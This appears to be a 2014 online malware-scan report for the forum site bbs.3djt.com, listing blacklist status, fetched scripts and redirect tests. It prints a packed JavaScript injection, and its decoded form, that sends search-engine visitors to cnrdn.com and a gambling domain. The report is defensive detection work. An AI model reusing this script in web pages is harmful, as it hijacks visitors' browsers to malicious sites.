Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bbs.3djt.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bbs.3djt.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bbs.3djt.com/ | 200 OK Content-Length: 6906 Content-Type: text/html | clean |
http://ad.baidusohu.com/123.js | 200 OK Content-Length: 396 Content-Type: application/x-javascript | clean |
http://api.discuz.com.de/Seo.js | 200 OK Content-Length: 702 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: cnrdn.com
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[02-79a-g]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3(4.7.9(\'a\')==-1){0 2=new Date();2.setTime(2.getTime()+8);4.7=\'a=1;expires=\'+2.toGMTString();0 b=4.referrer;0 5=[\'baidu\',\'google\',\'yahoo\',\'bing\',\'soso\',\'sogou\',\'360.cn\',\'so.c\',\'youdao\',\'anquan\'];for(0 i in 5){3(b.9(5[i])!=-1){3(d.6.e){d.6.e.f=\'g://www.bocai.ch/\'};6.f.href=\'g://cnrdn.c/AtDE\'}}}',[],17,'var||exp|if|document|bot|window|cookie||indexOf|whoami|ref|com|parent|opener|location|http'.split('|'),0,{}))
Decoded script:
if(document.cookie.indexOf('whoami')==-1){var exp=new Date();exp.setTime(exp.getTime()+8);document.cookie='whoami=1;expires='+exp.toGMTString();var ref=document.referrer;var bot=['baidu','google','yahoo','bing','soso','sogou','360.cn','so.com','youdao','anquan'];for(var i in bot){if(ref.indexOf(bot[i])!=-1){if(parent.window.opener){parent.window.opener.location='http://www.bocai.ch/'};window.location.href='http://cnrdn.com/AtDE'}}}
http://bbs.3djt.com/./index.aspx | 404 Not Found Content-Length: 571 Content-Type: text/html | clean |
http://bbs.3djt.com/test404page.js | 404 Not Found Content-Length: 571 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bbs.3djt.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Jul 2014 18:02:01 GMT
Accept-Ranges: bytes
Server: nginx/0.8.46
Vary: Accept-Encoding
Content-Length: 6906
Content-Type: text/html
Last-Modified: Wed, 16 Jul 2014 09:08:02 GMT
...6906 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bbs.3djt.com
Referer: http://www.google.com/search?q=bbs.3djt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.